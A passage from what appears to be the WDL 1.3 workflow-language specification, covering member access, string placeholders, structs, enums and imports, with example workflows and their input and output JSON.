StructorObjectvalue, whereyis a member name - A call in a workflow, where
yis an output name (a call can be thought of as a struct where the members are the outputs of the called task) - A type name reference to an enum, where
yis a choice name
Example: member_access.wdl
version 1.3
struct MyType {
String s
}
task foo {
command <<<
printf "bar"
>>>
output {
String bar = read_string(stdout())
}
}
workflow member_access {
# task foo has an output y
call foo
MyType my = MyType { s: "hello" }
output {
String bar = foo.bar
String hello = my.s
}
}
version 1.3
struct MyType {
String s
}
task foo {
command <<<
printf "bar"
>>>
output {
String bar = read_string(stdout())
}
}
workflow member_access {
# task foo has an output y
call foo
MyType my = MyType { s: "hello" }
output {
String bar = foo.bar
String hello = my.s
}
}
Example input:
{}
Example output:
{
"member_access.bar": "bar",
"member_access.hello": "hello"
}
Access to elements of compound members can be chained into a single expression.
Example: nested_access.wdl
version 1.3
struct Experiment {
String id
Array[String] variables
Map[String, String] data
}
workflow nested_access {
input {
Array[Experiment]+ my_experiments
}
Experiment first_experiment = my_experiments[0]
output {
# these are equivalent
String first_var = first_experiment.variables[0]
String first_var_from_first_experiment = my_experiments[0].variables[0]
# these are equivalent
String subject_name = first_experiment.data["name"]
String subject_name_from_first_experiment = my_experiments[0].data["name"]
}
}
version 1.3
struct Experiment {
String id
Array[String] variables
Map[String, String] data
}
workflow nested_access {
input {
Array[Experiment]+ my_experiments
}
Experiment first_experiment = my_experiments[0]
output {
# these are equivalent
String first_var = first_experiment.variables[0]
String first_var_from_first_experiment = my_experiments[0].variables[0]
# these are equivalent
String subject_name = first_experiment.data["name"]
String subject_name_from_first_experiment = my_experiments[0].data["name"]
}
}
Example input:
{
"nested_access.my_experiments": [
{
"id": "mouse_size",
"variables": ["name", "height"],
"data": {
"name": "Pinky",
"height": "7"
}
},
{
"id": "pig_weight",
"variables": ["name", "weight"],
"data": {
"name": "Porky",
"weight": "1000"
}
}
]
}
Example output:
{
"nested_access.first_var": "name",
"nested_access.first_var_from_first_experiment": "name",
"nested_access.subject_name": "Pinky",
"nested_access.subject_name_from_first_experiment": "Pinky"
}
Attempting to access a non-existent member of an object, struct, or call results in an error.
Example: illegal_access_fail.wdl
version 1.3
import "member_access.wdl"
workflow illegal_access {
input {
MyStruct my
}
Int i = my.x # error: field 'x' does not exist in MyStruct
call foo
output {
String baz = foo.baz # error: 'baz' is not an output field of task 'foo'
}
}
version 1.3
import "member_access.wdl"
workflow illegal_access {
input {
MyStruct my
}
Int i = my.x # error: field 'x' does not exist in MyStruct
call foo
output {
String baz = foo.baz # error: 'baz' is not an output field of task 'foo'
}
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Ternary operator (if-then-else)
This operator takes three arguments: a condition expression, an if-true expression, and an if-false expression. The condition is always evaluated. If the condition is true then the if-true value is evaluated and returned. If the condition is false, the if-false expression is evaluated and returned. The if-true and if-false expressions must return values of the same type, such that the value of the if-then-else is the same regardless of which side is evaluated.
Example: ternary.wdl
version 1.3
task mem {
input {
Array[String] array
}
Int array_length = length(array)
# choose how much memory to use for a task
String memory = if array_length > 100 then "2GB" else "1GB"
command <<<
>>>
requirements {
memory: memory
}
}
workflow ternary {
input {
Boolean morning
}
call mem { array = ["x", "y", "z"] }
output {
# Choose whether to say "good morning" or "good afternoon"
String greeting = "good ~{if morning then "morning" else "afternoon"}"
}
}
version 1.3
task mem {
input {
Array[String] array
}
Int array_length = length(array)
# choose how much memory to use for a task
String memory = if array_length > 100 then "2GB" else "1GB"
command <<<
>>>
requirements {
memory: memory
}
}
workflow ternary {
input {
Boolean morning
}
call mem { array = ["x", "y", "z"] }
output {
# Choose whether to say "good morning" or "good afternoon"
String greeting = "good ~{if morning then "morning" else "afternoon"}"
}
}
Example input:
{
"ternary.morning": true
}
Example output:
{
"ternary.greeting": "good morning"
}
Function Calls
WDL provides a standard library of functions. These functions can be called using the syntax func(p1, p2, ...), where func is the function name and p1 and p2 are parameters to the function.
Expression Placeholders and String Interpolation
Any WDL string expression may contain one or more "placeholders" of the form ~{*expression*}, each of which contains a single expression. Placeholders of the form ${*expression*} may also be used interchangably, but their use is discouraged for reasons discussed in the command section and may be deprecated in a future version of the specification.
When a string expression is evaluated, its placeholders are evaluated first, and their values are then substituted for the placeholders in the containing string.
Example: placeholders.wdl
version 1.3
workflow placeholders {
input {
Int i = 3
String start
String end
String instr
}
output {
String s = "~{1 + i}"
String cmd = "grep '~{start}...~{end}' ~{instr}"
}
}
version 1.3
workflow placeholders {
input {
Int i = 3
String start
String end
String instr
}
output {
String s = "~{1 + i}"
String cmd = "grep '~{start}...~{end}' ~{instr}"
}
}
Example input:
{
"placeholders.start": "h",
"placeholders.end": "o",
"placeholders.instr": "hello"
}
Example output:
{
"placeholders.cmd": "grep 'h...o' hello",
"placeholders.s": "4"
}
In the above example, command would be parsed and evaluated as:
grep ': literal string~{start}: identifier expression, replaced with the value ofstart...: literal string~{end}: identifier expression, replaced with the value ofend': literal string~{input}: identifier expression, replaced with the value ofinput- Final string value created by concatenating 1-6
Placeholders may contain other placeholders to any level of nesting, and placeholders are evaluated recursively in a depth-first manner. Placeholder expressions are anonymous, i.e., they have no name and thus cannot be referenced by other expressions, but they can reference declarations and call outputs.
Example: nested_placeholders.wdl
version 1.3
workflow nested_placeholders {
input {
Int i
Boolean b
}
output {
String s = "~{if b then '~{1 + i}' else '0'}"
}
}
version 1.3
workflow nested_placeholders {
input {
Int i
Boolean b
}
output {
String s = "~{if b then '~{1 + i}' else '0'}"
}
}
Example input:
{
"nested_placeholders.i": 3,
"nested_placeholders.b": true
}
Example output:
{
"nested_placeholders.s": "4"
}
Placeholders are evaluated in multi-line strings exactly the same as in regular strings. Common leading whitespace is stripped from a multi-line string before placeholder expressions are evaluated.
Example: multiline_string_placeholders.wdl
version 1.3
workflow multiline_string_placeholders {
String spaces = " "
String name = "Henry"
String company = "Acme"
output {
# This string evaluates to: " Hello Henry,\n Welcome to Acme!"
# The string still has spaces because the placeholders are evaluated after removing the
# common leading whitespace.
String multi_line = <<<
~{spaces}Hello ~{name},
~{spaces}Welcome to ~{company}!
>>>
}
}
version 1.3
workflow multiline_string_placeholders {
String spaces = " "
String name = "Henry"
String company = "Acme"
output {
# This string evaluates to: " Hello Henry,\n Welcome to Acme!"
# The string still has spaces because the placeholders are evaluated after removing the
# common leading whitespace.
String multi_line = <<<
~{spaces}Hello ~{name},
~{spaces}Welcome to ~{company}!
>>>
}
}
Example input:
{}
Example output:
{
"multiline_string_placeholders.multi_line": " Hello Henry,\n Welcome to Acme!"
}
Expression Placeholder Coercion
The result of evaluating an expression in a placeholder must ultimately be converted to a string in order to take the place of the placeholder in the command script. This is immediately possible for WDL primitive types due to automatic conversions ("coercions") that occur only within the context of string interpolation:
Stringis substituted directly.Fileis substituted as if it were aString.Directoryis substituted as if it were aString. The resulting string does not have a trailing slash.Intis formatted without leading zeros (unless the value is0), and with a leading-if the value is negative.Floatis printed in the style[-]ddd.dddddd, with 6 digits after the decimal point.Booleanis converted to the "stringified" version of its literal value, i.e.,trueorfalse.
Compound types cannot be implicitly converted to Strings. To convert an Array to a String, use the sep function: ~{sep(",", str_array)}. See the guide on WDL value serialization for more details and examples.
If an expression within a placeholder evaluates to None, and either causes the entire placeholder to evaluate to None or causes an error, then the placeholder is replaced by the empty string.
Example: placeholder_coercion.wdl
version 1.3
workflow placeholder_coercion {
input {
File x
}
String x_as_str = x
Int? i = None
output {
Boolean is_true1 = "~{"abc"}" == "abc"
Boolean is_true2 = "~{x}" == x_as_str
Boolean is_true3 = "~{5}" == "5"
Boolean is_true4 = "~{3.141}" == "3.141000"
Boolean is_true5 = "~{3.141 * 1E-10}" == "0.000000"
Boolean is_true6 = "~{3.141 * 1E10}" == "31410000000.000000"
Boolean is_true7 = "~{i}" == ""
}
}
version 1.3
workflow placeholder_coercion {
input {
File x
}
String x_as_str = x
Int? i = None
output {
Boolean is_true1 = "~{"abc"}" == "abc"
Boolean is_true2 = "~{x}" == x_as_str
Boolean is_true3 = "~{5}" == "5"
Boolean is_true4 = "~{3.141}" == "3.141000"
Boolean is_true5 = "~{3.141 * 1E-10}" == "0.000000"
Boolean is_true6 = "~{3.141 * 1E10}" == "31410000000.000000"
Boolean is_true7 = "~{i}" == ""
}
}
Example input:
{
"placeholder_coercion.x": "data/hello.txt"
}
Example output:
{
"placeholder_coercion.is_true1": true,
"placeholder_coercion.is_true2": true,
"placeholder_coercion.is_true3": true,
"placeholder_coercion.is_true4": true,
"placeholder_coercion.is_true5": true,
"placeholder_coercion.is_true6": true,
"placeholder_coercion.is_true7": true
}
Example: placeholder_none.wdl
version 1.3
workflow placeholder_none {
output {
String? foo = None
# The expression in this string results in an error (calling `select_first` on an array
# containing no non-`None` values) and so the placeholder evaluates to the empty string and
# `s` evalutes to: "Foo is "
String s = "Foo is ~{select_first([foo])}"
}
}
version 1.3
workflow placeholder_none {
output {
String? foo = None
# The expression in this string results in an error (calling `select_first` on an array
# containing no non-`None` values) and so the placeholder evaluates to the empty string and
# `s` evalutes to: "Foo is "
String s = "Foo is ~{select_first([foo])}"
}
}
Example input:
{}
Example output:
{
"placeholder_none.foo": null,
"placeholder_none.s": "Foo is "
}
Concatenation of Optional Values
Within expression placeholders the string concatenation operator (+) gains the ability to operate on optional values. When applied to two non-optional operands, the result is a non-optional String. However, if either operand has an optional type, then the concatenation has type String?, and the runtime result is None if either operand is None (which is then replaced with the empty string).
Example: concat_optional.wdl
version 1.3
workflow concat_optional {
input {
String salutation = "hello"
String? name1
String? name2 = "Fred"
}
output {
# since name1 is undefined, the evaluation of the expression in the placeholder fails, and the
# value of greeting1 = "nice to meet you!"
String greeting1 = "~{salutation + ' ' + name1 + ' '}nice to meet you!"
# since name2 is defined, the evaluation of the expression in the placeholder succeeds, and the
# value of greeting2 = "hello Fred, nice to meet you!"
String greeting2 = "~{salutation + ' ' + name2 + ', '}nice to meet you!"
}
}
version 1.3
workflow concat_optional {
input {
String salutation = "hello"
String? name1
String? name2 = "Fred"
}
output {
# since name1 is undefined, the evaluation of the expression in the placeholder fails, and the
# value of greeting1 = "nice to meet you!"
String greeting1 = "~{salutation + ' ' + name1 + ' '}nice to meet you!"
# since name2 is defined, the evaluation of the expression in the placeholder succeeds, and the
# value of greeting2 = "hello Fred, nice to meet you!"
String greeting2 = "~{salutation + ' ' + name2 + ', '}nice to meet you!"
}
}
Example input:
{}
Example output:
{
"concat_optional.greeting1": "nice to meet you!",
"concat_optional.greeting2": "hello Fred, nice to meet you!"
}
Among other uses, concatenation of optionals can be used to facilitate the formulation of command-line flags.
Example: flags_task.wdl
version 1.3
task flags {
input {
File infile
String pattern
Int? max_matches
}
command <<<
# If `max_matches` is `None`, the command
# grep -m ~{max_matches} ~{pattern} ~{infile}
# would evaluate to
# 'grep -m <pattern> <infile>', which would be an error.
# Instead, make both the flag and the value conditional on `max_matches`
# being defined.
grep ~{"-m " + max_matches} ~{pattern} ~{infile} | wc -l
>>>
output {
Int num_matches = read_int(stdout())
}
}
version 1.3
task flags {
input {
File infile
String pattern
Int? max_matches
}
command <<<
# If `max_matches` is `None`, the command
# grep -m ~{max_matches} ~{pattern} ~{infile}
# would evaluate to
# 'grep -m <pattern> <infile>', which would be an error.
# Instead, make both the flag and the value conditional on `max_matches`
# being defined.
grep ~{"-m " + max_matches} ~{pattern} ~{infile} | wc -l
>>>
output {
Int num_matches = read_int(stdout())
}
}
Example input:
{
"flags.infile": "data/greetings.txt",
"flags.pattern": "world"
}
Example output:
{
"flags.num_matches": 2
}
๐ Expression Placeholder Options
Expression placeholder options are option="value" pairs that precede the expression within an expression placeholder and customize the interpolation of the WDL value into the containing string expression.
There are three options available. An expression placeholder may have at most one option.
sep: convert an array to a string using a delimiter; e.g.,~{sep=", " array_value}.trueandfalse: substitute a value depending on whether a boolean expression istrueorfalse; e.g.,~{true="--yes" false="--no" boolean_value}.default: substitute a default value for an undefined expression; e.g.,~{default="foo" optional_value}.
Expression placeholder options are deprecated and will be removed in WDL 2.0. In the sections below, each type of placeholder option is described in more detail, including how to replicate its behavior using future-proof syntax.
sep
sep is interpreted as the separator string used to join together the elements of an array. sep is only valid if the expression evaluates to an Array.
For example, given a declaration Array[Int] numbers = [1, 2, 3], the expression "python script.py ~{sep=',' numbers}" yields the value: python script.py 1,2,3.
Alternatively, if the command were "python script.py ~{sep=' ' numbers}" it would evaluate to: python script.py 1 2 3.
Requirements:
sepMUST accept only a string as its valuesepis only allowed if the type of the expression isArray[P]
The sep option can be replaced with a call to the sep function:
Example: sep_option_to_function.wdl
version 1.3
workflow sep_option_to_function {
input {
Array[String] str_array
Array[Int] int_array
}
output {
Boolean is_true1 = "~{sep(' ', str_array)}" == "~{sep=' ' str_array}"
Boolean is_true2 = "~{sep(',', quote(int_array))}" == "~{sep=',' quote(int_array)}"
}
}
version 1.3
workflow sep_option_to_function {
input {
Array[String] str_array
Array[Int] int_array
}
output {
Boolean is_true1 = "~{sep(' ', str_array)}" == "~{sep=' ' str_array}"
Boolean is_true2 = "~{sep(',', quote(int_array))}" == "~{sep=',' quote(int_array)}"
}
}
Example input:
{
"sep_option_to_function.str_array": ["A", "B", "C"],
"sep_option_to_function.int_array": [1, 2, 3]
}
Example output:
{
"sep_option_to_function.is_true1": true,
"sep_option_to_function.is_true2": true
}
Test config:
{
"tags": ["deprecated"]
}
true and false
true and false convert an expression that evaluates to a Boolean into a string literal when the result is true or false, respectively.
For example, "~{true='--enable-foo' false='--disable-foo' allow_foo}" evaluates the expression allow_foo as an identifier and, depending on its value, replaces the entire expression placeholder with either --enable-foo or --disable-foo.
Both true and false cases are required. If one case should insert no value then an empty string literal is used, e.g. "~{true='--enable-foo' false='' allow_foo}".
Requirements:
trueandfalsevalues MUST be string literals.trueandfalseare only allowed if the type of the expression isBoolean- Both
trueandfalsecases are required.
The true and false options can be replaced with the use of an if-then-else expression:
Example: true_false_ternary_task.wdl
version 1.3
task true_false_ternary {
input {
String message
Boolean newline
}
command <<<
# these two commands have the same result
printf "~{message}~{true="\n" false="" newline}" > result1
printf "~{message}~{if newline then "\n" else ""}" > result2
>>>
output {
Boolean is_true = read_string("result1") == read_string("result2")
}
}
version 1.3
task true_false_ternary {
input {
String message
Boolean newline
}
command <<<
# these two commands have the same result
printf "~{message}~{true="\n" false="" newline}" > result1
printf "~{message}~{if newline then "\n" else ""}" > result2
>>>
output {
Boolean is_true = read_string("result1") == read_string("result2")
}
}
Example input:
{
"true_false_ternary.message": "hello world",
"true_false_ternary.newline": false
}
Example output:
{
"true_false_ternary.is_true": true
}
Test config:
{
"tags": ["deprecated"]
}
default
The default option specifies a value to substitute for an optional-typed expression with an undefined value.
Requirements:
- The type of the default value must match the type of the expression
- The type of the expression must be optional, i.e., it must have a
?postfix quantifier
The default option can be replaced in several ways - most commonly with an if-then-else expression or with a call to the select_first function.
Example: default_option_task.wdl
version 1.3
task default_option {
input {
String? s
}
command <<<
printf ~{default="foobar" s} > result1
printf ~{if defined(s) then "~{select_first([s])}" else "foobar"} > result2
printf ~{select_first([s, "foobar"])} > result3
>>>
output {
Boolean is_true1 = read_string("result1") == read_string("result2")
Boolean is_true2 = read_string("result1") == read_string("result3")
}
}
version 1.3
task default_option {
input {
String? s
}
command <<<
printf ~{default="foobar" s} > result1
printf ~{if defined(s) then "~{select_first([s])}" else "foobar"} > result2
printf ~{select_first([s, "foobar"])} > result3
>>>
output {
Boolean is_true1 = read_string("result1") == read_string("result2")
Boolean is_true2 = read_string("result1") == read_string("result3")
}
}
Example input:
{}
Example output:
{
"default_option.is_true1": true,
"default_option.is_true2": true
}
Static Analysis and Dynamic Evaluation
As with any strongly typed programming language, WDL is processed in two distinct phases by the implementation: static analysis and dynamic evaluation.
- Static analysis is the process of parsing the WDL document and performing type inference - that is, making sure the WDL is syntactically correct, and that there is compatibility between the expected and actual types of all declarations, expressions, and calls.
- Dynamic evaluation is the process of evaluating all WDL expressions and calls at runtime, when all of the user-specified inputs are available.
An implementation should raise an error as early as possible when processing a WDL document. For example, in the following task the sub function is being called with an Int argument rather than a String. This function call cannot be evaluated successfully, so the implementation should raise an error during static analysis, rather than waiting until runtime.
task bad_sub {
Int i = 111222333
String s = sub(i, "2", "4")
}
On the other hand, in the following example all of the types are compatible, but if the hello.txt file does not exist when the File value is created (when evaluating the declaration File f = "hello.txt"), then an error will be raised.
task missing_file {
File f = "hello.txt"
command <<<
printf "~{sep(","), read_lines(f)}"
>>>
}
WDL Documents
A WDL document is a file that contains valid WDL definitions.
A WDL document must contain:
- A
versionstatement on the first non-comment line of the file. - At least one
structdefinition,taskdefinition,workflowdefinition.
A WDL document may contain any combination of the following:
- Any number of
importstatements. - Any number of
structdefinitions. - Any number of
taskdefinitions. - A maximum of one
workflowdefinition.
To execute a WDL workflow, the user must provide the execution engine with the location of a "primary" WDL file (which may import additional files as needed) and any input values needed to satisfy all required task and workflow input parameters, using a standard input JSON file or some other execution engine-specific mechanism.
If a workflow appears in the primary WDL file, it is called the "top-level" workflow, and any workflows it calls via imports are "subworkflows". Typically, it is an error for the primary WDL file to not contain a workflow; however, an execution engine may choose to support executing individual tasks.
Versioning
There are multiple versions of the WDL specification. Every WDL document must include a version statement to specify which version (major and minor) of the specification it adheres to. From draft-3 forward, the first non-comment statement of all WDL files must be a version statement. For example:
version 1.3
or
#Licence header
version 1.3
A WDL file that does not have a version statement must be treated as draft-2.
Because patches to the WDL specification do not change any functionality, all revisions that carry the same major and minor version numbers are considered equivalent. For example, version 1.3 is used for a WDL document that adheres to the 1.3.x specification, regardless of the value of x.
Struct Definition
A Struct type is a user-defined data type. Structs enable the creation of compound data types that bundle together related attributes in a more natural way than is possible using the general-purpose compound types like Pair or Map. Once defined, a Struct type can be used as the type of a declaration like any other data type.
Struct definitions are top-level WDL elements, meaning they exist at the same level as import, task, and workflow definitions. A struct cannot be defined within a task or workflow body.
A struct is defined using the struct keyword, followed by a name that is unique within the WDL document, and a body containing the member declarations. A struct member may be of any type, including compound types and even other Struct types. A struct member may be optional. Declarations in a struct body differ from those in a task or workflow in that struct members cannot have default initializers.
A struct definition may include a meta section with metadata about the struct, and a parameter_meta section with metadata about any of the struct's members. These sections have identical sematics to task and workflow meta and parameter_meta sections. Any key in the parameter_meta section must correspond to a member of the struct.
Example: person_struct_task.wdl
version 1.3
struct Name {
String first
String last
}
struct Income {
Float amount
String period
String? currency
}
struct Person {
Name name
Int age
Income? income
Map[String, File] assay_data
meta {
description: "Encapsulates data about a person"
}
parameter_meta {
name: "The person's name"
age: "The person's age"
income: "How much the person makes (optional)"
assay_data: "Mapping of assay name to the file that contains the assay data"
}
}
task greet_person {
input {
Person person
}
Array[Pair[String, File]] assay_array = as_pairs(person.assay_data)
command <<<
printf "Hello ~{person.name.first}! You have ~{length(assay_array)} test result(s) available.\n"
if ~{defined(person.income)}; then
if [ "$(printf "%.0f" ~{select_first([person.income]).amount})" -gt 1000 ]; then
currency="~{select_first([select_first([person.income]).currency, "USD"])}"
printf "Please transfer $currency 500 to continue"
fi
fi
>>>
output {
String message = read_string(stdout())
}
}
version 1.3
struct Name {
String first
String last
}
struct Income {
Float amount
String period
String? currency
}
struct Person {
Name name
Int age
Income? income
Map[String, File] assay_data
meta {
description: "Encapsulates data about a person"
}
parameter_meta {
name: "The person's name"
age: "The person's age"
income: "How much the person makes (optional)"
assay_data: "Mapping of assay name to the file that contains the assay data"
}
}
task greet_person {
input {
Person person
}
Array[Pair[String, File]] assay_array = as_pairs(person.assay_data)
command <<<
printf "Hello ~{person.name.first}! You have ~{length(assay_array)} test result(s) available.\n"
if ~{defined(person.income)}; then
if [ "$(printf "%.0f" ~{select_first([person.income]).amount})" -gt 1000 ]; then
currency="~{select_first([select_first([person.income]).currency, "USD"])}"
printf "Please transfer $currency 500 to continue"
fi
fi
>>>
output {
String message = read_string(stdout())
}
}
Example input:
{
"greet_person.person": {
"name": {
"first": "Richard",
"last": "Rich"
},
"age": 14,
"income": {
"amount": 1000000,
"period": "annually"
},
"assay_data": {
"wealthitis": "data/hello.txt"
}
}
}
Example output:
{
"greet_person.message": "Hello Richard! You have 1 test result(s) available.\nPlease transfer USD 500 to continue"
}
Test config:
An invalid struct:
struct Invalid {
String myString = "Cannot do this"
Int myInt
}
Enum Definition
An enum is an enumerated type. Enums enable the creation of types that represent closed sets of alternatives (called "choices") that are semantically valid in a specific context. Once defined, an enum type can be used as the type of a declaration like any other type. However, new choices of an enum cannot be created. Instead, a declaration having an enum type must be assigned one of the choices created as part of the enum's definition.
An enum definition is a top-level WDL element, meaning it is defined at the same level as tasks, workflows, and structs, and it cannot be defined within a task or workflow body. An enum is defined using the enum keyword, followed by a name that is unique within the WDL document, and a body containing a comma-delimited list of choices in braces ({}). Choice names within an enum must be unique, and enum names must not conflict with struct names or other enum names.
enum Color {
Red,
Blue,
Green
}
An enum can be thought of as a closed type with a fixed set of instances. The enum keyword creates both a type (that can be used in declarations) and a global namespace containing the enum's choices. For example, Color.Red refers to a specific instance of the Color enum type.
Unlike structs, it is not possible to create new instances of an enum outside of the enum's definition. An enum value can only be one of the choices defined in the enum's declaration.
Enum Usage
An enum's choices are accessed using a . to separate the choice name from the enum's identifier.
A declaration with an enum type can only be initialized by referencing a choice directly or by assigning it to the value of another declaration of the same enum type.
Two enum values can be tested for equality (i.e., using == or !=). To be equal, two enum values must be the same choice of the same enum type. For example, Color.Red == Color.Red evaluates to true, while Color.Red == Color.Blue evaluates to false. A comparison of two enum values of different enum types is considered a type mismatch error. Enum values are not ordered, so they cannot be compared with ordinal operators (i.e., using >, >=, <, <=).
When an enum value is serialized using string interpolation, it is serialized to its choice name. To extract the inner value of an enum choice, use the value() standard library function.
An enum cannot be coerced to or from any other type. However, an enum value can be serialized to/deserialized from JSON and can be used in command sections.
version 1.3
enum Pet {
Cat,
Mouse,
Bird
}
enum ComputerDevice {
Mouse,
Keyboard,
Monitor
}
task compare_enum_types {
input {
Pet? pet
}
Pet my_pet = select_first([pet, Pet.Mouse])
command <<<
echo "I have a pet ~{my_pet}"
>>>
output {
Boolean different_types = Pet.Mouse != ComputerDevice.Mouse
}
}
Enum Serialization and Deserialization
Enum values are serialized and deserialized differently depending on the context.
JSON Input and Output for Enums
When an enum value appears in JSON input or output files, it is represented by its choice name (not its inner value). The choice name is specified as a string without the enum type prefix.
For example, given this enum:
enum Color {
Red = "#FF0000",
Green = "#00FF00",
Blue = "#0000FF"
}
workflow example {
input {
Color favorite_color
}
output {
Color result = favorite_color
}
}
Input JSON uses the choice name:
{
"example.favorite_color": "Red"
}
Output JSON also uses the choice name:
{
"example.result": "Red"
}
The execution engine validates that the provided string matches one of the enum's choice names. If an invalid choice name is provided, the execution engine must raise an error during input validation.
Command Section Serialization of Enums
When an enum value is used in a command section with string interpolation, it is serialized to its choice name (not the inner value). To access the inner value, use the value() function.
For example:
enum VerbosityFlag {
Quiet = "",
Info = "-v",
Debug = "-vv",
Trace = "-vvv"
}
task run_tool {
input {
VerbosityFlag verbosity = VerbosityFlag.Info
}
command <<<
echo "Using verbosity level: ~{verbosity}"
my_tool ~{value(verbosity)} input.txt
>>>
}
When verbosity is VerbosityFlag.Info, the command becomes:
Using verbosity level: Info
my_tool -v input.txt
This demonstrates that ~{verbosity} produces the choice name "Info", while ~{value(verbosity)} produces the inner value "-v".
Import Statements
Although a WDL workflow and the task(s) it calls may be defined completely within a single WDL document, splitting it into multiple documents can be beneficial in terms of modularity and code resuse. Furthermore, complex workflows that consist of multiple subworkflows must be defined in multiple documents because each document is only allowed to contain at most one workflow.
The import statement is the basis for modularity in WDL. A WDL document may have any number of import statements, each of which references another WDL document and allows access to that document's top-level members (tasks, workflows, and structs).
The import statement specifies a WDL document source as a string literal, which is interpreted as a URI. The execution engine is responsible for resolving each import URI and retrieving the contents of the WDL document. The contents of the document in each URI must be a WDL document with the same major version and a minor version less than or equal to the minor version of the importing document.
Each imported WDL document must be assigned a unique namespace that is used to refer to its members. By default, the namespace of an imported WDL document is the filename of the imported WDL, minus the .wdl extension. A namespace can be assigned explicitly using the as <identifier> syntax. The tasks and workflows imported from a WDL file are only accessible through the assigned namespace - see Fully Qualified Names & Namespaced Identifiers for details.
import "http://example.com/lib/analysis_tasks" as analysis
import "http://example.com/lib/stdlib.wdl"
workflow wf {
input {
File bam_file
}
# file_size is from "http://example.com/lib/stdlib"
call stdlib.file_size {
file=bam_file
}
call analysis.my_analysis_task {
size=file_size.bytes, file=bam_file
}
}
Import URIs
A document is imported using it's URI, which uniquely describes its local or network-accessible location. The execution engine must at least support the following protocols for import URIs:
http://https://- ๐
file://- Using thefile://protocol for local imports can be problematic. Its use is deprecated and will be removed in WDL 2.0.
In the event that there is no protocol specified, the import is resolved relative to the location of the current document. In the primary WDL document, a protocol-less import is relative to the folder that contains the primary WDL file. If a protocol-less import starts with / it is interpreted as relative to the root of the file system that contains the primary WDL file.
Some examples of correct import resolution:
| Root Workflow Location | Imported Path | Resolved Path |
|---|---|---|
| /foo/bar/baz/qux.wdl | some/task.wdl | /foo/bar/baz/some/task.wdl |
| http://www.github.com/openwdl/coolwdls/myWorkflow.wdl | subworkflow.wdl | http://www.github.com/openwdl/coolwdls/subworkflow.wdl |
| http://www.github.com/openwdl/coolwdls/myWorkflow.wdl | /openwdl/otherwdls/subworkflow.wdl | http://www.github.com/openwdl/otherwdls/subworkflow.wdl |
| /some/path/hello.wdl | /another/path/world.wdl | /another/path/world.wdl |
Importing and Aliasing Structs
When importing a WDL document, any struct definitions in that document are "copied" into the importing document. This enables structs to be used by their name alone, without the need for any namespace. prefix.
A document may import two or more struct definitions with the same name so long as they are all identical. To be identical, two struct definitions must have members with exactly the same names and types and defined in exactly the same order.
A struct may be imported with a different name using an alias clause of the form alias <source name> as <new name>. If two structs have the same name but are not identical, at least one of them must be imported with a unique alias. To alias multiple structs, simply add more alias clauses to the import statement. If aliases are used for some structs in an imported WDL but not others, the unaliased structs are still imported under their original names.
Example: import_structs.wdl
version 1.3
import "person_struct_task.wdl"
alias Person as Patient
alias Income as PatientIncome
# This struct has the same name as a struct in 'structs.wdl',
# but they have identical definitions so an alias is not required.
struct Name {
String first
String last
}
# This struct also has the same name as a struct in 'structs.wdl',
# but their definitions are different, so it was necessary to
# import the struct under a different name.
struct Income {
Float dollars
Boolean annual
}
struct Person {
Int age
Name name
Float? height
Income income
}
task calculate_bill {
input {
Person doctor
Patient patient
PatientIncome average_income = PatientIncome {
amount: 50000,
currency: "USD",
period: "annually"
}
}
PatientIncome income = select_first([patient.income, average_income])
String currency = select_first([income.currency, "USD"])
Float hourly_income = if income.period == "hourly" then income.amount else income.amount / 2000
Float hourly_income_usd = if currency == "USD" then hourly_income else hourly_income * 100
command <<<
printf "The patient makes $~{hourly_income_usd} per hour\n"
>>>
output {
Float amount = hourly_income_usd * 5
}
}
workflow import_structs {
input {
File infile
Person doctor = Person {
age: 10,
name: Name {
first: "Joe",
last: "Josephs"
},
income: Income {
dollars: 140000,
annual: true
}
}
Patient patient = Patient {
name: Name {
first: "Bill",
last: "Williamson"
},
age: 42,
income: PatientIncome {
amount: 350,
currency: "Yen",
period: "hourly"
},
assay_data: {
"glucose": infile
}
}
}
call person_struct_task.greet_person {
person = patient
}
call calculate_bill {
doctor = doctor, patient = patient
}
output {
Float bill = calculate_bill.amount
}
}
version 1.3
import "person_struct_task.wdl"
alias Person as Patient
alias Income as PatientIncome
# This struct has the same name as a struct in 'structs.wdl',
# but they have identical definitions so an alias is not required.
struct Name {
String first
String last
}
# This struct also has the same name as a struct in 'structs.wdl',
# but their definitions are different, so it was necessary to
# import the struct under a different name.
struct Income {
Float dollars
Boolean annual
}
struct Person {
Int age
Name name
Float? height
Income income
}
task calculate_bill {
input {
Person doctor
Patient patient
PatientIncome average_income = PatientIncome {
amount: 50000,
currency: "USD",
period: "annually"
}
}
PatientIncome income = select_first([patient.income, average_income])
String currency = select_first([income.currency, "USD"])
Float hourly_income = if income.period == "hourly" then income.amount else income.amount / 2000
Float hourly_income_usd = if currency == "USD" then hourly_income else hourly_income * 100
command <<<
printf "The patient makes $~{hourly_income_usd} per hour\n"
>>>
output {
Float amount = hourly_income_usd * 5
}
}
workflow import_structs {
input {
File infile
Person doctor = Person {
age: 10,
name: Name {
first: "Joe",
last: "Josephs"
},
income: Income {
dollars: 140000,
annual: true
}
}
Patient patient = Patient {
name: Name {
first: "Bill",
last: "Williamson"
},
age: 42,
income: PatientIncome {
amount: 350,
currency: "Yen",
period: "hourly"
},
assay_data: {
"glucose": infile
}
}
}
call person_struct_task.greet_person {
person = patient
}
call calculate_bill {
doctor = doctor, patient = patient
}
output {
Float bill = calculate_bill.amount
}
}
Example input:
{
"import_structs.infile": "data/hello.txt"
}
Example output:
{
"import_structs.bill": 175000.0
}
When a struct A in document X is imported with alias B in document Y, any other structs imported from X into Y with members of type A are updated to replace A with B when copying them into Y's namespace. The execution engine is responsible for maintaining mappings between structs in different namespaces, such that when a task or workflow in X with an input of type A is called from Y with a value of type B it is coerced appropriately.
To put this in concrete terms of the preceding example, when Person is imported from structs.wdl as Patient in import_structs.wdl, its income member is updated to have type PatientIncome. When the person_struct.greet_person task is called, the input of type Patient is coerced to the Person type that is defined in the person_struct namespace.
struct Patient {
Name name
Int age
PatientIncome? income
Map[String, Array[File]] assay_data
}
Importing and Aliasing Enums
Enums are imported in the same way as Structs and have the same namespacing rules, namely that Enums exist in the document's global scope, and importing an enum copies its definition into the global scope of the importing document (potentially using an alias).
version 1.3
import "color.wdl" alias Color as Hue
workflow another_wf {
input {
Hue hue = Hue.BLUE
}
...
}
Enum Compatibility
When the same enum name is imported from multiple sources, the imports must be structurally compatible to avoid conflicts. Two enum definitions are considered compatible if and only if they have the same type parameter (both explicit with matching types, or both inferred/implicit) and the choices exactly match, including the order.
